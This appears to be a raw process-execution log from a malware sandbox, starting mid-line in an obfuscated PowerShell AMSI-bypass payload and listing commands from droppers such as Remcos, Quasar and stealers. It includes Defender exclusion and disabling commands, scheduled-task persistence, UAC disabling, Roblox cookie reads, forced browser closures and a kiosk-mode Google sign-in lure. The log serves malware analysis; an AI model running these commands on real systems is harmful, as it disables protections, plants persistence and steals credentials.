+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+'l'+'l'+'');$hzMEouUjDYAEWgYrz=$caQOLnnOVyUQtA.Invoke($Null,@([Object]$TyKejPz,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$jSOydZrhHK=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($URmAhnvwEKANDSeyw,$PoeYYrnupxOdRIAddSDagH).Invoke($hzMEouUjDYAEWgYrz,[uint32]8,4,[ref]$jSOydZrhHK);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$hzMEouUjDYAEWgYrz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($URmAhnvwEKANDSeyw,$PoeYYrnupxOdRIAddSDagH).Invoke($hzMEouUjDYAEWgYrz,[uint32]8,0x20,[ref]$jSOydZrhHK);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+'TW'+'A'+'R'+'E'+'').GetValue(''+'r'+''+[Char](117)+''+[Char](116)+''+'s'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{c1aa2d9e-c61f-4595-b9c9-87085f2a3831}

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Users\Admin\AppData\Local\Temp\a\qwex.exe

"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 460 -p 5204 -ip 5204

C:\Users\Admin\AppData\Local\Temp\a\XW.exe

"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5204 -s 1416

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"

C:\Users\Admin\AppData\Local\Temp\a\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"

C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe

"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"

C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe

"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"

C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 548 -p 3200 -ip 3200

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3200 -s 308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe

"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe

"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe

"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k swprv

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4012 -ip 4012

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4012 -s 1224

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe" && pause

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2080 -s 292

C:\Users\Admin\AppData\Local\Temp\a\jy.exe

"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Users\Admin\AppData\Local\Temp\is-A3TU6.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-A3TU6.tmp\jy.tmp" /SL5="$C0112,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

ping localhost

C:\Users\Admin\AppData\Local\Temp\a\test30.exe

"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4864 -ip 4864

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 852

C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe

"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5116 -ip 5116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4996 -ip 4996

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 444

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 1292

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:3

C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe

"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding C3B8B64ABBA0A86523A6E16BAE0AF93E

C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe

"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GpKccFX4bnCh.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Local\Temp\a\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe

"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"

C:\Windows\SYSTEM32\msiexec.exe

msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ouCRXiP71ylE.bat" "

C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe

"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"

C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 6104 -ip 6104

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 1292

C:\Users\Admin\AppData\Local\Temp\a\leto.exe

"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 6112 -ip 6112

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 580

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 6112 -ip 6112

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 588

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

\??\c:\program files (x86)\internet explorer\iexplore.exe

"c:\program files (x86)\internet explorer\iexplore.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Users\Admin\AppData\Local\Temp\1014479001\c7611183bd.exe

"C:\Users\Admin\AppData\Local\Temp\1014479001\c7611183bd.exe"

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6245.tmp\6246.tmp\6247.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Users\Admin\AppData\Local\Temp\1014480001\5b3682fec0.exe

"C:\Users\Admin\AppData\Local\Temp\1014480001\5b3682fec0.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"

C:\Users\Admin\AppData\Local\Temp\1014481001\f903843309.exe

"C:\Users\Admin\AppData\Local\Temp\1014481001\f903843309.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5096 -ip 5096

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1932 -prefMapHandle 1920 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a8ee8605-b83f-47be-9bab-19dfa966a823} 7932 "\\.\pipe\gecko-crash-server-pipe.7932" gpu

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 1280

C:\Users\Admin\AppData\Local\Temp\1014482001\c3b2dc643f.exe

"C:\Users\Admin\AppData\Local\Temp\1014482001\c3b2dc643f.exe"

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AB35.tmp\AB36.tmp\AB37.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Users\Admin\AppData\Roaming\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 8248 -ip 8248

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8248 -s 80

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Users\Admin\AppData\Local\Temp\1014483001\8513e02f5d.exe

"C:\Users\Admin\AppData\Local\Temp\1014483001\8513e02f5d.exe"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe

"C:\Users\Admin\AppData\Local\Temp\1014484001\4070a7fd78.exe"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 7056 -ip 7056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7056 -s 776

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe

"C:\Users\Admin\AppData\Local\Temp\1014485001\8541bb3477.exe"

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "

\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe

"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 7200 -ip 7200

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7200 -s 76

